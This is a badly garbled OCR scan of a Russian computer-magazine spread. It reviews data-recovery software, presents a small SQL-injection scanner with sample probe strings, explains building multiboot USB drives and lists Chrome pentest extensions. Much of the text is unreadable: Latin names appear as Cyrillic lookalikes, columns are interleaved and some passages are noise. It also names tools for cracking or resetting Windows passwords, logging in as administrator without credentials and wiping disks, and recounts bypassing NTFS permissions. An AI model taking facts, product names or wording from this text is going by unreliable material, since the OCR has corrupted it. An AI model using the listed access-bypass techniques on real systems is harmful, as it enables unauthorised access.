образа диска, простой и понятный интерфейс, работа с 
КА! и .мит-файлами, работа во многих ОС, восстанов- 
ление данных в локальной сети. 

Основные недостатки: отсутствие бесплатной версии. 


Г три вые ин | __ 
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о’ Обывьть 22 Пеарьть 
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Елены рРЕРЕЕЕЕНЫЙ 
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Не 5сауепадег 


ОС: \Мп9ом/5 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: АТ, МТЕ$ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (русского нет] 
СТОИМОСТЬ: $49,95 


САЙТ. млм. ди ек. согп 


Небольшая, но богатая по функционалу программа. Раз- 
мер ЕЦе 5сауепдег составляет менее 1 Мб, но это не по- 
мешало тулзе справиться стестами «на ура». Интересно, 
что прогу необязательно даже устанавливать на компью- 
тер — существует возможность запуска портативной вер- 
сии. Ее 5сауепдег отличается поразительной быстротой 
работы. Остальные решения из обзора явно проигрывают 
ей по этому показателю. Приятно радует минималистич- 
ный интерфейс: для восстановления данных достаточно 
буквально нескольких кликов. Но несмотря на кажу- 
щуюся простоту, решение более чем функционально. 
Помимо восстановления данных на локальных дисках 
поддерживается работа с сетью. Приложение знакомо и 
с восстановлением файловс КАЮ-массивов. При этом 
разработчики не занимаются маркетингом, предлагая 
десять тысяч разных версий по астрономическим ценам. 


И. 


_ ВесоуегМуЕе$ 


ОС: ММпЧо\/ 
ТИПЫ ФАЙЛОВЫХ СИСТЕМ: РАТ, МТЕ$, НЕЗ, НЕ5+ 
ЯЗЫК ИНТЕРФЕЙСА: многоязычный [русского нет] 


СТОИМОСТЬ: $69,95 — $299,90 › 9 Ее Зсауепдег со всем доступным функционалом постав- 
САЙТ: млллм. гесоуеггпуй(е$.согп На диске мы собрали ляется в единственной версии и стоит $49,95. 
для тебя подборку 
Эта программа вполне может составить конкуренцию тех утилит, которые Основные преимущества: минималистичный ин- 
ЕЦе 5сауепдег по части минималистичности интерфейса успешно справилисьс терфейс, работа с КАП, работа с локальной сетью, 
и юзабилити. На главном экране перед пользователем нашими тестами. скорость работы. 
предстает всего две кнопки — восстановление файлови Основные недостатки: мало поддерживаемых файло- 
восстановление раздела диска. Скорость работы навы- вых систем. 


соте, хоть онаи ниже, чему ЕЦе 5сауепдег. КесоуегМуЕ Це 
умеет работать с основными файловыми системами 
\М/паом/5 и Мас О5Х, но разработчики в скором будущем 
обещаюттакже поддержку ЕХТ2 и ЕХТЗ. Решение по- 
ставляется втрех версиях, младшая из которых стоит ни 
много ни мало $69,95. 


Основные преимущества: минималистичный интер- 
фейс, работа с КАТЮ, скорость работы. 

Основные недостатки: мало поддерживаемых файло- 
вых систем, цена. 


навливаем 


записи на нег 
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Ом гаск“ 


ЕазуКесоуегу 


ОС: Мп ом/5 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ, МТЕ$ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский] 
СТОИМОСТЬ: от 6458 руб. 


САЙТ: мллм.еазугесоуегу.ги 


ЕазуКесоуегу — младшая сестра предыдущих двух про- 
грамм. Она обладаетуже куда более скромным функциона- 
лом, но все нашитесты прошла на «отлично». ЕазуКесоуегу 
умеет работать только в двух файловых системах — ГАТ 

и МТЕ$, что выдаетее ориентированность на домашних 
пользователей. Но есть и некоторые приятные особенно- 
сти. Во-первых, прога имеет достаточно мощный аппарат 
для диагностики диска (тест наличия потенциальныхап- 
паратных проблем}, а во-вторых, предлагает средства ре- 
ставрации поврежденных файлов М$ О!се и 71р-файлов. 
Стоит отдельно отметить режим работы «Кам Кесоуегу». В 
этом режиме ЕауКесоуегу сканирует носитель и собира- 
етфайлы по частям на основании имеющихся сигнатур. 
Сигнатура — это характерный фрагмент, по которому можно 
понять, что файл относится копределенномутипу. Список 
имеющихся сигнатур впечатляет, при этом, воспользовав- 
шись предложенными инструментами, сигнатуры можно 
добавить и самому. К сожалению, даже самая простая 
лицензия стоит очень недешево — более 6тысяч рублей. 


Основные преимущества: простой интерфейс, ап- 
парат для диагностики диска, средства реставрации 
поврежденных файлов М5 ОЁ1се и 71р-файлов. 
Основные недостатки: мало поддерживаемых файло- 
вых систем, цена. 


Результаты тестов 


сеЮагаВаск 


ОС: Мп ом/5 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ, МТЕЗ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный [включая русский] 
СТОИМОСТЬ: $69-$79 


САЙТ. млм. гипите.ога 


Внимательный читатель возможно заметит: 
Се{Па{аВаск является платной программой, и онане 
смогла пройти третий тест, однако все же попала в об- 
зор. Гутнадо сделать оговорку. Восстановление данных 
— процесс достаточно непредсказуемый. Вариантов 
порчи данных и самого диска великое множество. 
Поэтому невозможно точно сказать, какое решение 
лучшее. Очевидно, что прога не справилась со смоде- 
лированным нами тестом, но вто же время Се{Па{аВаск 
давно зарекомендовала себя, как профессиональный 
инструмент восстановления данных, который в состоя- 
нии справиться со многими серьезными поломками. 
Сильным преимуществом утилиты является возмож- 
ность восстанавливать файлы наудаленных дисках в 
локальной сети. Программа имеет две версии — для 
МТЕб и ЕАТ, стоимостью $79 и $69 соответственно. 


Основные преимущества: скорость работы, работа с 
локальной сетью. 

Основные недостатки: мало поддерживаемых файло- 
вых систем. 
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$230 — $3300 
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ЦЕб Ехр/огег Весомег Е21.95 - Е129.95 РС 1МФРЕСТОВ Ее Весомег 
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КесомегМуРе $69.95 - $299.90 Нее/пае!@е 
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Бесплатные решения 
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ЮРесиуа 


ОС: Мп ом/5 
ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ, МТЕ$ 
ЯЗЫК ИНТЕРФЕЙСА: многоязычный [включая русский] 


САЙТ. мил. риг огл. согп/гесима 


Известная и хорошо разрекламированная на западе 
программа, которую без конца хвалят западные блоге- 
ры. И, вобщем-то, есть за что. Кесиуа смогла без труда 
преодолеть два первых нашихтеста, быстро справив- 
шись с восстановлением случайно удаленных файлов. 
В принципе именно так и позиционируютее разработ- 
чики. Быстрое сканирование раздела занимает, как 
правило, не больше минуты. Для сложных случаев есть 
более глубокие режимы поиска удаленных данных. Но 
даже в этом случае восстановление данных с носителя 
с поврежденной таблицей разделов программе оказа- 
лось не по зубам. 


Основные преимущества: простота использования. 
Основные недостатки: недостаточная фун кциональность. 
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Ю.бауег 


ОС: МИпдом/5 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ, МТЕ$ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский] 
САЙТ: (аб.гиюоо[$/гзамег. В гп( 


К.5ауег — это относительно новый продукт, но уже завоевавший уважениеу многих 
специалистов по восстановлению данных. По сути, это не что иное, какурезанная 
версия профессионального ЦЕ$ Ехр(огег Кесо\уегу. Поэтому нет ничего удивитель- 
ного, что среди бесплатных приложений прога выглядит серьезнее всего. Она 
единственная справилась со всеми тремя тестами. К.Зауег работает безустановки 
и предлагает восстановление данных с двух наиболее распространенных у обычных 
юзеров файловых систем — ЕАГи МТЕ5. К томуже приложение можно использовать, 
как инструмент для доступа ксамым разным файловым системам: Арр(е Мас 05 
[НЕ$, НЕЗ-/НЕОХ) пих (Е хё2, Ех 3, Ех, БезегЕ$, /Е$ и ХЕ$] ит.д. Учитывая, что 
большинству из наснафигне сдалась работа с КАЮ-массивами и восстановление 
данных по сети, К.Зауег в большинстве случаев ничуть не проигрывает коммерче- 
ским продуктам. Проведенныетесты — лишнее тому подтверждение. 


Основные преимущества: широкий функционал. 
Основные недостатки: мало поддерживаемых файловых систем. 


РС МУРЕСТОК НЕ Кесоуегу 


ОС: Мп ом/5 
ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ, МТЕ$ 
ЯЗЫК ИНТЕРФЕЙСА: многоязычный [включая русский] 


САЙТ. илл. рстзрес{ог.де 


Этот продукт отнемецких разработчиков так же, каки Бесиха, смог пройти 
только два первых теста. И хотя производителем заявлена возможность вос- 
становления данных в ситуации, когда «у диска отсутствует буквенный иден- 
тификатор или диск недоступен», полное отсутствие загрузочного раздела 
ему все же оказалось не по зубам. У решения есть также специальная версия 
РС МУРЕСТОК тай Кесоуегу, специально заточенная для восстановления 
файлов с карт памяти и флешек. 


Основные преимущества: минималистический интерфейс. 
Основные недостатки: недостаточная функциональность. 


Конечно, наши тесты едва ли могут дать ответ: «Какая из программ лучшая?». Да и никто не может. Среди специалистов наибольшее 
уважение вызывают К-З{иато и ЧЕ$ Ехр([огег Бесоуегу. Последняя дешевле и имеет версии сразу под несколько операционных систем. 
Впрочем, в большинстве случаев в них нет необходимости. Ты и сам убедился, что бесплатная К.5ауег справляется с наиболее типичны- 
ми ситуациями ничуть не хуже. Поэтому если вдруги возникли проблемы, то начать их решениея рекомендую именно сее помощью. == 
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РС_СОМЕ 


Ш № Мирослав Стампар (ипсопс{ои$ т! п9.6{09$рой. сот] 


© Когда смотришь на коммерческие 
сканеры безопасности, то подчас 
удивляешься: «За что клиенты платят 
столько денег?». Занимаясь последние 
несколько лет разработкой открытого 
проекта $9(тар (59\тар.зоигсегогде.пе!), 
я все чаще убеждаюсь, что многие 
продукты относятся к проблеме поиска 
50[-инъекций спустя рукава. До 
смешного простые приемы вроде 
отправления 501 (например, добавляя 
символы вроде «')» в качестве значения 
параметров) и примитивные проверки на 
слепые инъекции (вроде «АМ 1=1») не 
стоят того, чтобы просить за них не одну 
сотню баксов. Большинство из таких 
программ выдают невыносимо большое 
количество ложных срабатываний, 
опираясь в большинстве своем на 
ошибках ОВМ5, которые сами по себе 
еще ничего не доказывают. Нужно ли 
говорить, есть ли толк от таких 
прекрасных отчетов? 


98 строчек кода 0555 
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Ргоо|-о-Сопсер{ 


мееше 18 


сканер 5@[-уязвимостей 
строк Кода 


Что я сделал? Чтобы показать, чего стоят все эти проверки 


в коммерческих сканерах, я решил написать небольшую 
утилиту, обязательно меньше 100 строчек кода, которая 


ео 


по функционалу была бы лучше или, по крайней мере, не 
хуже большинства этих переоцененных коммерческих 
сканеров. Если по эффективности она не будетуступать 
платным продуктам, то их разработчикам придется на- р шо 


много усерднее делать свою работу, чтобы привлечь об- Оригинальный текст 
ратно своих клиентов. Так родилась утилита Ватп 5таЦ 
5@Н 5саппег (0$555}, которую я написал на Ру{оп. И да, 
сейчас в ней — 98 строчек кода. 


Сканер поддерживает сканирование на глубину одного 


Мирослава на 
английском ты 
можешь посмотреть 


на О\0-диске. 


линка, игру с параметрами (561 ро!5оп!п9], обработку 
сообщений об ошибках и определение двенадца- 

ти разныхтипов ОВМ5 [Му5Я(, Огасце, Роз{агеб (Ц, 
Мусгозо 501 Зегуег ит.д.), динамические нагрузки для 


слепых инъекций с использованием наиболее рас- 
пространенных суффиксов и префиксов с продвинутым 
определением ответов сервера. Последние реализуются 
путем автоматического анализа заголовка страницы, 

ее длины, кода ответа НТТР (200, 404, ит.д.], атакже не- 
четкого сравнения содержимого страницы [при помощи 
стандартного Ру{Поп-модуля ЧНЕИЬ). Короче говоря, 
получилось очень толково. 

Предлагаю всем скачать и изучить код Ватп 5таЦ О 
Эсаппег [9 Виб.сопп/5{аппрагтт/0555}, модифицировать 
его под себя и использовать для поиска потенциальных 
уязвимостей в своих разработках. И помни, еслиты не 
сорвешь фрукты, которые низко висят, это точно сделает 
кто-то другой. == 


| ТЕРРА № 


Шаги 5глай 5ОИ 5саппег нашел две возможные 
(1 -уязвимости 
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Ш № Степан «5{ер» Ильин (мег. сот/5{ераН] 


© Не знаю как ты, а я сделал загрузоч- 
ную флешку с \МИпаом$ 7 на борту по 
инструкции из прошлого номера. 
Подвернулся повод: коллега, закрывая 
документ, отказалась от сохранения измене- 
ний последних трех часов работы и прибе- 
жала к засидевшимся в редакции с мольбой 
о помощи :]. Очень скоро стало ясно, что 
свежей версии документа нет нигде и ни в 
каком виде, кроме как в скриншотах (да и 

то — лишь с некоторой долей вероятности), 
которые автоматически генерятся системой 
учета за работой сотрудников. Файлы хра- 
нятся локально (что очень странно}, но 
доступ к ним есть только у админа. Админа в 
позднее время уже не было. А вопрос горел. 
В общем, в голову нам не пришло ничего 
лучше, чем создать загрузочную флешку, с 
которой можно загрузиться и обратиться к 
файлам на жестком диске, обойдя политику 
безопасности МТЕЗ. Но не об этом речь. 
Главное — флешка с \\Мп7РЕ оказалась в 
нашем распоряжении. По ходу дела у кого- 
то возник вопрос: а как уместить на носите- 
ле сразу несколько систем? Скажем, 
\МЛп7РЕ, ВасКгасК и какой-нибудь дистри- 
бутив для сброса админского пароля? 

Мы уже проделывали когда-то такой трюк. 
Для этого заливали на флешку загрузчик 
губ 440$ с помощью утилиты дгибт${ 
(Чомпюа9.дпа.ога/дгибий и потом вручную 
редактировали конфиг тепч.[${, добавляя 
для каждой системы описание ее 15О0-файла. 
Это не самый удобный способ — гораздо 


сподручнее создавать мультизагрузочную 
флешку с помощью одной из специальных 


Тестируем загрузочную флешку В ОЕМО Выбираем образы для компиляции 
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утилит: 


® УОМ! (Мл. репаеме{пих.согп); 
® САКОЧ [млммм..загЧиса.Н); 


® ХВООТ [5Кез.доод(е.сот/5Ке/5Вагпигхбоой. 
Тут дело не только в удобном СЦ|- 
интерфейсе, но и в большом количестве 
преднастроек для загрузчика для каждой 
конкретной ОС. Посмотрим, как это работает, 
на примере ХВООТ. 

1. Процесс создания мультизагрузочной 
флешки до безобразия прост. В общем 
случае — нужно просто агад’п’агор-нуть 
15О’шки, которые ты хочешь записать 

на флешку или диск на вкладке «Сгез{е 
Ми[Боо{ Ч5ВЛ$0». Для многих образов 
автоматически происходит распознавание 
типа дистрибутива (правда, в тупую — по 
имени файла): от этого зависят параметры 
конфигурации загрузчика, в том числе 
название пункта меню, которое будет 
появляться во время запуска, и раздела, в 
которой эта система попадет (Мпих, (у и 
Т.д.]. Так, для ОН\пе МТ Разз\мога & Кед®гу 
ЕаКог и Вас гаск программа даже ничего 
не спросила и просто добавила системы в 
список. Для всех мало-мальски популярных 
дистрибутивов будет точно так же. 

2. С собственными сборками чуть сложнее. 
Для моего образа загрузочной «семерки» 
автоматическое распознавание не сработа- 
ло, и ХВООТ предложила выбрать дистри- 
бутив из огромного выпадающего списка. 

К счастью, в нем оказался подходящий 
пункт «РЕ, МЗБАБТ, ЕКО [М/пдом/$ Ма 

& 7 опу.]». Сложно представить, что под- 
ходящей конфигурации ты не найдешь, но 


а в аь— лы 
| М ов Бия 
= п. Зы. пы 


Е та а 


и а т 


| =— = 


| 
т] 
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КОЛОНКА РЕДАКТОРА 


ПРО МУЛЬТИ- 
ЗАГРУЗОЧНУЮ 
ФЛЕШКУ 


если вдруг — используй пункт «Ада итд 
Сгиуб 490$ птаде ЕтщаНоп». Это наиболее 
универсальный вариант настройки. 

3. Дальше можно создать |15О’шку или же 
сразу перенести все файлы и загрузчик на 
флешку. В последнем случае необходимо 
выбрать диск (флешку), а также исполь- 
зуемый бутлоадер [5у$Ипих, который пред- 
лагается по умолчанию, или бгиб40оз]. 
Все остальное программа сделает за тебя. 
Работоспособность как готового образа, 
так и загрузочной флешки можно тут же 
проверить на виртуальной машине ДЕМО, 
которая уже встроена в ХВООТ. Если все 
прошло хорошо, то ты сразу увидишь нека- 
зистое [ну правда!} меню загрузчика для 
выбора системы. Поменять порядок пунктов 
в меню и внести любые другие коррективы 
ты по-прежнему можешь вручную в конфиге 
уз пих.сГО. 

4. Собственно, все готово, но есть несколь- 
ко нюансов. 

® Если что-то не запустится под УМ\/аге/ 
ОЕМУ/Л/{иа(Вох, это еще не значит, что 
это действительно не работает. Попробуй 
загрузиться на реальной системе: есть все 
шансы, что на самом деле все более чем 
работоспособно. 

® Для создания ти {Боста{е-флешки 
крайне рекомендуется использовать 
ГАТЗ2. В случае с МТЕ$ некоторые Ипих- 
дистрибутивы не заработают. Если тебя 
беспокоит ограничение раздела ЕАТЗ?, 
просто отформатируй носитель с помощью 
ВКРргер5В {001 [5Кез.доод[е.сопп/5Ке/ 
ггаргерузЪ)}, которая позволяет сделать раз- 
дел ло 2 Тб. 

® И последнее. Для работы ХВООТ в 
системе должен быть установлен .МЕТ 
Егагпемиогк 4. Если программа будет 
вываливаться, ссылаясь на отсутствие 
библиотеки РСК.Ежепе!опв, то решается это 
скачиваением аЦ-ек с сайта дапрежепз!оп®. 
содер{ех.сот и размещением их папке 
мита %/ву{егп32. 

Чтобы лучше понимать, зачем тебе это 
может пригодиться, мы отобрали самые 
лучшие загрузочные системы. Схема — 
справа. 
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РС_СОМЕ 


Антивирусы 


Сложно придумать более эффективный способ справиться с малва- 


рью, которая уже обосновалась в системе, чем загрузиться в неза- 


висимую ОС и запустить толковый антивирусный сканер. К счастью, 


сейчас все антивирусные компании как один смастерили загрузоч- 


ные версии своих продуктов. В доказательство привожу этот длинный 
список [ме ОС с различными антивирусами на борту. 


управления 
Ж 


азделами 


СТкого Диска 


©, 


ь 


Сопей Ща 
Идеальная замена 
легендарному Мопоп 
Сво$1 для клони- 
рования дисков, а 
также создания об- 
разов разделов для 
быстрого восстанов- 
ления системы. 


Ра“{е4 Мад!с/ 
СРацед 

Редактор разделов, 
инструмент для рабо- 
ты собразами, тулза 
для восстановления 
загрузочных запи- 
сей, атакже редактор 
таблицы разделов — 
в одном флаконе. 


РАС 

РИМС [Рагитаде [$ 
Мо бПо${) 
[/уеСО-дистрибутив, 
позволяющий вы- 
полнять разметку 
жесткого диска, 
делать бэкап данных, 
восстанавливать 
удаленные файлы, 
реанимировать БИОС. 


Обход систем авторизации 


орисгасЕ 
ОрВсгасКк Муе 
Система для взлома 
1 МИМТЕМ хэшей 
паролей Уп о\м/з 

с использованием 
радужных таблиц. 


ОНИпе МТ Ра$$\/ога 
& Кед!${гу ЕЧКог 
Инструментнатот 
случай, если нужно 
обнулить пароль 
какого-то из поль- 
зователей \\Лп4о\м/5- 
системы или внести 
какие-то изменения в 
ее реестр, не имея со- 
ответствующих прав. 


Диагностика проблем 


Меп\ке${86+ 
Высокоэффективный 
тестоперативной 
памяти, позволяю- 
щий выявить ошибки 
в модулях КАМ, часто 
приводящих кне- 
стабильности работы 
компьютера. 
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Мачд!с Воо+{ 01$К с 
МНОО 

Самое популярное 
бесплатное решение 
для низкоуровневой 
диагностики жестких 
Дисков. 


Коп-Вос{ 

Этот пакет, записан- 
ный на флешку, по- 
зволит залогиниться 
в установленную на 
компьютере систему, 
причем неважно 
ММЛидом/$ или пих, 
с правами админи- 
стратора. 


Ота{е Воо{ СО 
Сборка из более 100 
утилит, с помощью 
которыхты можешь 
провести диагности- 
ку железа и выявить 
многие проблемы. 


э Г-бесиге Кезсие СО 


® Мопоп Вос{а е Кесоуегу Тоо| 
® Амга Апи\Мг Кезсие бу${ет 
® Казрег$Ку «Кау Кезсие СО0» 


® Рапда баЁе Са 
® Д\/С Кезсие СО 


е ВЦОеепдегРезсие СО 


® Ог\/\е6 мес О 
эебсап Кезсие 01$К 
® СОа{а АпИ\Мги$ Етегдепсу 5у&ет 


® Дсгоп!5 АпИгтпаМ/аге СО 
» ОБитти МаМаге Кетоуа( Тоо(Ки 


Восстановление 


системы 


в) 


нее 
"Митя 


Гы 


5у$<етКезсиеС9 
Специальный дис- 
трибутив для восста- 
новления системы 
после сбоя и потери 
части данных. 


мАнчй С 

ТЕМЕ 

Если в систему 

не войти, можно 
использовать этот 
[/уе-дистрибутив, 
построенный на базе 
[Чпих, но полно- 
стью повторяющий 
интерфейс \/Ипом/з 
ХР и позволяющий 
запускать виндовые 
приложения под \\/пе. 


МОТОР 
ить вы аш ыывыын 
[п9415Ког Шуе 

Набор бенчмарков, 
состоящий из разно- 
образных инструмен- 
тов для тестирования 
установленного в 
компьютере железа. 


2 


ТгтНу Кезсие КЦ 
Загрузочный на- 
борутилит для 
восстановления 
работоспособности 
ММЛидом/$-системы, 
включающий по- 
мимо прочего 5 анти- 
вирусных продуктов. 


Кедо ВасКир Шуе СО 
Отличная разработ- 
ка, призванная взять 
на себя обязанности 
по бэкапу данных. 


Загрузка через сеть 


пеБоо{.те 
Совершенно чу- 
десная разработка, 
которая при наличии 
доступа в Сеть позво- 
лит запустить одну из 
дюжины различных 
систем, автомати- 
чески подгрузив не- 
обходимые данные 
из инета. 


Собственная безопасность 


63 

Оаг!К’$ Вос{ 

Апа МикКе 

Очень опасная вещь! 
Сразу при загрузке 
намертво удалит 

все файлы с жестких 
дисков, затерев их 
несколько раз [для 
верности] случайны- 
ми данными. 


Ме{Воо{СО 

А этотинструмент по- 
сле загрузки сам ска- 
чает необходимые 
файлы и установит 


выбранную [Чпих ОС 
на компьютер. 


Тог 


Тац$ 
Система для аноним- 


ного выхода в Интер- 
нет без логов и стро- 
го по защшищенному 
Тог-соединению. 
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орк асши| 
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аиста 52 АУ 2 и Ш № м 


© Очень многие впечатляются и радуются скорости работы бооц(е Спготе, 
но удивительное дело, даже не пробовали подключить дополнительные 
расширения. Какая глупость! Толковых аддонов пока действительно не 
так много, но уже сейчас есть набор расширений, которые могут 
пригодиться для пенстеста. Впрочем, большинство из них с большой 
вероятностью окажутся полезными и для вполне мирных целей. 
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Аудит чашевсетоначинается санализа Тех технологий и инструментов, которые исполь- 
зуются веб-приложением. Применялся ли какой-то готовый движок, на каком веб-сервере 
все крутится, естьли еще сайты, которые хостятся натом же сервере (и возможно уязви- 
мы] — ответы на эти вопросы дадут специальные расширения. 


Сбор информации 


иНпоегрипепо 


с © сбабьни 
АЛЛА Я 


г] @ообю Ала 


Ала 


ке ИОмегу 


амаоре Гаги 


СЁ Сцатесая 


Алая 


$) ММогаргева 


См 


\\арра!утег 6Й.у/оПа1К 


Этотаддон изначально разработан для РигеТох, а потому 
ты, возможно, с ним уже знаком. Сейчас это, пожалуй, 
лучшее решение для определения технологий, которые 
применялись для построения ресурса. Большинство 
движков СМ5/форумов/блогов имеют ряд характерных 
признаков, по которым можно распознать фактих ис- 
пользования. Например, тег <та пате=«депега{ог» 
соп{еп(=«\\/огаРгезс 3.1» /> недвусмысленно указывает 
нато, что сайт построен на движке \\огаРгез$. Чем за- 
нимается \\Марра(тег, так это исследует исходники стра- 
ницы и пытается распознать подобные метки. В базе 
\арра(тегесть данные по всем самым популярным 


Спготе пег 
ОН у/аМРх 


СПготе 5пШег во многом повто- 
ряет функционал \\арра(утега 
и выполняет НпдегргпИ па 
используемых на странице 
фреймворков, движкови ./5- 
библиотек. Всего в базе сейчас 
находятся слепки 100 популяр- 
ных инструментов. В случае 
удачного распознавания их 
иконки отображаются прямо в 
адресной строке. 


решениям для создания порталов, блогов, форумов, 


хостинг-панелей, электронных магазинов. 


СИНЫБ Онпкир, Раг! "| [| 


№ ЕСПЬССЛ 


а а 
вл Белан Бара ото сое Раельлер а ОФВ тому и Рагие 
ТАА, & Вриа. | 
Мелье речку а Бель РНР роди Мест ла: Фито = 
ча АННЫ Ерье еелы галлы ул НЫ я - 


\\Меб 5егуег МойНег 
ОН у/пКм/Лт4 


А это расширение отодного парижского 
ботаника (как он сам себя называет] де- 
лают одну, но очень важную вещь — пыта- 
ется определить веб-сервер, на котором 
крутится проект. Распознав Арасйе, П5, 
Модтпх, СМ/Ъ, [19ВЕрЧ или какой-то другой 
веб-сервер, \\еБ 5егуег МойЙег выводит 
соответствующую пиктограмму в адрес- 
ную строку. 
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—] Ва ва Вы я 
+3 с а пыль 0 


ава па а не ‚ 


Ч \МеБ деуе!юорте! 
й 


|": И 


Нубу оп На” 9 ай ООеП-5 05 
ог ргобгатитег Нарриуеье ат! | 
виа. Воды. сода Вы [амо "| 


\\Меб Тесппооду МоНйег 
БИ у/пО бу! 


Не менее важно знать, какая технология ис- 


пользована для выполнения веб-приложения: 


Кибу РНР, АЗР.МЕТ или что-тоеще? \МеБ 
Тесвпооду МойНег пытается осуществить 
соответствующий Ипдегргтйпд. Важно, что 
выявляются еще и многие сопряженныес 
этими технологиями инструменты: например, 
Рвизоп Раззепдег для приложений на Кибу 
или Горе для приложений на Ру{оп. 


ТОРИ. оси 


Пе То 


== Гы вы и === “= == 


21° ма р 
8 ре | рый Евы. 


ыы а М ара: сарЕ БЫ Ры рае рака. ПНА. ВЕ 
о а т с в 
а т 
о сы ра о ля 

= Ный ЗЫ ыы 
и ы 

За вые ГЫ 
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|Р АДааге$$ погтпайоп 

ОН у/о9з3 Хх; 

Пищу для размышления может подкинуть 
информация о хосте из М/НО]5 и других от- 
крытых источников. И, пожалуй, нет более 
удобного способа ее получить, нежели 
заюзать |Р Адаге$$ ипоггпайоп. Расшире- 
ние в один клик предоставляет геолока- 
ционную информацию, справку из \/НО]|5$, 
отчет из базы спам-ресурсов, данныео 
О№5, хостинге, атакже [и это моелюбимое] 
соседях по домену [других сайтах, которые 
хостятся на этом же сервере). 


НИР Неааег$ 

БИ у/рИ9 7/7 

Зачастую администраторы не пытаются 
скрыть информацию об используемых 
программных средствах и технологиях, 
и она отображается прямо в НТТР- 
заголовках (например, Х-Ромегед-Ву 

и бегуег]. Чтобы быстро посмотреть 
хедеры в ответах сервера, рекомендую 
установить аддон НТТР Неадеге. 
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Манипуляция 


сНИР-запросами 


ууу еение 
ЗЕ ЕЯЯЯЕССЕ 


Е 
а рее не ы 1 
мрь ГРАН ый кени, фацри рН Гей ан ео Ы, 
РгИрь Горы аа крсазьрии, гори зи чыфьРаунт  равгегы тет 
р 
РНБ ГРЫ ый НЫ КОН РВ Г Бе ЕВ В БН 
НА Гр БАН, Бр И ГНО ЫИЧЬЕЯ ГРЕЧ 9 
прь гнать фор сия грчиты у рааый ума ат тать 
кр ГРЫ анть ское сое Г фе Белка 
КИТ Геры кд ив Кросса Герая и БыгьЕ 
Е а ро ааа в 


Имея некоторое представление отом, с чем имеем дело, можно приступать непосредственно 
к аудиту. Инструментами первой необходимости тутявляются расширения, позволяющие, 
во-первых, отслеживать те НТТР-запросы, которые отправляются на веб-сервер, во-вторых, 
как угодно модифицировать их, «играя» с различными параметрами, и, в-третьих, удобно 


просматривать вернувшийся результат. 


ея Е а а 
ит —- ШЕЯ | й 
ки, 9 
Фи а ‚0 Аве МН Та Оыт 
№. 
ии: 200 ОК 


пилите ие |; тео 
Мос, 01 дц 3011 1748-30 СМТ 
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ПИТ || «ЕООСТИРЕ НОО рее ВС иное ЕЯ 
О И ее т ТЕ 
СОНИ Тб ЕТО ЕО го 


Аггау 


Кеаче$! Макег оН./у/оК\УП\/\Л/ 


Для ЕгеГох а есть известный аддон Тагтрег О/ака, ко- 
торый на лету перехватывает и позволяет изменить 
НТТР/НТТР5-заголовки, атакже РО$Т-параметры. В 
силу ограничений архитектуры расширений бооде 
СВготе полностью реализовать аналогичный функ- 
ционал пока невозможно, но Кедце<{ МакКегмакси- 
мально близко приблизился к этому. С его помощью 
ты легко сможешь мониторить запросы, сделанные 
веб-страницами, играться с ЧК, заголовками, 

и РОЗТ-данными, атакже конструировать новые 
запросы. Тутнадо отметить, что Кедце${ Макегпере- 


НТТР Кезроп$е 
Вгом/зег БЙ.|у/ 
о\ЛМН1Р 


Это расширение так же, как и 
Кедиез{ МакКег, предназначено 
для составления самых разных 
НТТР-запросов (правда с по- 
мощью ХМЕНЕрКедиез{, что 
накладывает ограничения). Ты 
можешь изменять параметры 
запроса или хедеров и изучать 
реакцию приложения. 


хватывает не все, а только запросы, отправленные 
через НТМЁЕ -формы или ХМЕНЕрКеаце$($, поэтому 
в логах не будеткучи лишней информации о загрузке 


изображений или С55-стилей. 


Игры 
скукисами 


р БЫ а еее 2 ги рпышив ры 
В И 
| № ВР || дрерба дани 
Е НИТ 1 фаир ги 
вх ОГО 1 прерии плена 
Е МЫ | двери ле 
ы КТВ | рвы аи 
| № [рр лия 
К 8 | бываы рынра лыя 
& ый | Верея срироля паи 
Е Ба | рые фары ВанЕы 
в Ыыя | она: Бы рб ] 
р 
сыре" “одвиываыь ниша атьн | 


Бащаыи Пеле пушек и нет 


Бы 
| ыы 


"= 


ве: 


пет 


|! 


Еай ТА!$ СооКе ой.|у/рЕСаом 


Что удивительно, для манипуляции с куки- 
сами долгое время не было даже достойного 
расширения. И только сейчас появился за- 
мечательный аддон Ед и ТВ!$ Сооке, позво- 
ляющий через всплывающую панель удалить 
произвольные куки на текущем сайте, редак- 
тировать их значения или создать уже новые 
«плюшки». Очень радует возможность для 
автоматизации: задав регулярку для поиска, 
можно создать специальный фильтр, который 
будет автоматически удалять нежелатель- 
ные кукисы. Помимо этого есть опция для 
создания так называемых Кеаа-Оп/-кукисов, 
которые не сможет модифицировать никакой 
сайти никакое другое расширение. 


"ига"; п, 
"перга": "ЕВ. ", 


Аауапсеа КЕЗТ сет 
ДАррйсаНоп БЙ.[у/рХо2УБ 


Инструмент, изначально реализованный в виде 
расширения, атеперь Сбготе-приложения 
(программы, работающей внутри браузера]. В 
отличие от НТТР Кезропзе Вго\м/ег, это не про- 
сто помощник для составления произвольных 
НТТР-запросов. Адуапсед КЕЗТ сИеп{ пред- 
лагает много интересных фишек, втом числе 
продвинутый просмотр ответов в форматах 
50МиХМЕ с подсветкой синтаксиса, удобный 
составитель НТТР-заголовков [подсказки + 
система автодополнения] и многое другое. Не- 
заменимая вещь, когда необходимо взаимо- 
действовать с сервисами, возвращающими 
ответв /5ОМ или ХМЁ -форматах. 


Важным компонентом для работы веб-приложений являются кукисы, которые хранит браузер. С их 
помощью сервисы узнаюттебя, не запрашивая повторной авторизации, отслеживаюттвою активность 
[ай-ай-ай) и вообще сильно в них нуждаются. Увы, СВгогпе, каки другие браузеры, практически не пред- 
ставляют возможностей для манипуляции с кукисами. По умолчанию. 


ВЫ 58 5 28-5 25: 5-52 52 5. 5-5: Пр Шы-ы в а--ю ва ыы. 


Ч 52 в 262 5 ва и Ба 58 БЫ оао 5 обо 5 сб: 8 БЫ гб БЫ обо 5 обо 58 бе а ва в 


то 3 


5м/ар Му Сооке$ БП /у/о|сххо 


Необходимость использовать несколько аккаун- 
